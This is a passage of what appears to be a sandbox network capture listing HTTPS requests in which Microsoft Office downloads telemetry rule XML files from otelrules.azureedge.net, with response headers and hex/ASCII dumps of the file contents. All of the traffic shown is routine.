                                                                                                                                                                            2024-10-28 18:12:36 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            98192.168.2.44985113.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:36 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:36 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:36 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                            ETag: "0x8DC582BE055B528"
                                                                                                                                                                            x-ms-request-id: 816a6405-301e-001f-06d8-21aa3a000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181236Z-17fbfdc98bbwj6cp6df5812g4s00000006wg00000000abkn
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:36 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            99192.168.2.44985213.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:36 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:36 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:36 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                            ETag: "0x8DC582BE1223606"
                                                                                                                                                                            x-ms-request-id: eff8debc-001e-0065-199c-270b73000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181236Z-r1755647c66vwt2b5wfzb6a204000000020000000000f6f8
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:36 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            100192.168.2.44985413.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:36 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:36 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:36 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                            ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                            x-ms-request-id: 08154944-901e-0083-2112-29bb55000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181236Z-17fbfdc98bbwj6cp6df5812g4s00000006w000000000cttc
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:36 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            101192.168.2.44985313.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:36 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:37 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:36 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                            ETag: "0x8DC582BE7262739"
                                                                                                                                                                            x-ms-request-id: c21b1165-c01e-008e-596f-287381000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181236Z-17fbfdc98bbfmg5wrf1ctcuuun00000005v00000000037ww
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:37 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            102192.168.2.44985513.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:36 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:37 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:36 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                            ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                            x-ms-request-id: 672cac94-f01e-00aa-27b2-268521000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181236Z-r1755647c66t77qv3m6k1gb3zw0000000550000000000beg
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:37 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            103192.168.2.44985613.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:37 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:37 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:37 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                            ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                            x-ms-request-id: ead33fc5-401e-0029-0967-289b43000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181237Z-r1755647c66qg7mpa8m0fzcvy000000006gg00000000cpnb
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:37 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            104192.168.2.44985713.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:37 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:37 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:37 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                            ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                            x-ms-request-id: 4bfb087f-501e-008f-4c9c-279054000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181237Z-17fbfdc98bbngfjxtncsq24exs000000074g000000006mu5
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:37 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            105192.168.2.44985813.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:37 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:38 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:37 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                            ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                            x-ms-request-id: 92d64d37-101e-0034-119c-2796ff000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181237Z-r1755647c66tsn7nz9wda692z000000003tg000000004wem
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:38 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            106192.168.2.44986013.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:37 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:38 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:37 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1427
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                            ETag: "0x8DC582BE56F6873"
                                                                                                                                                                            x-ms-request-id: 0c5aa6f6-c01e-000b-5d92-25e255000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181237Z-r1755647c66f4bf880huw27dwc00000006u0000000002y8g
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
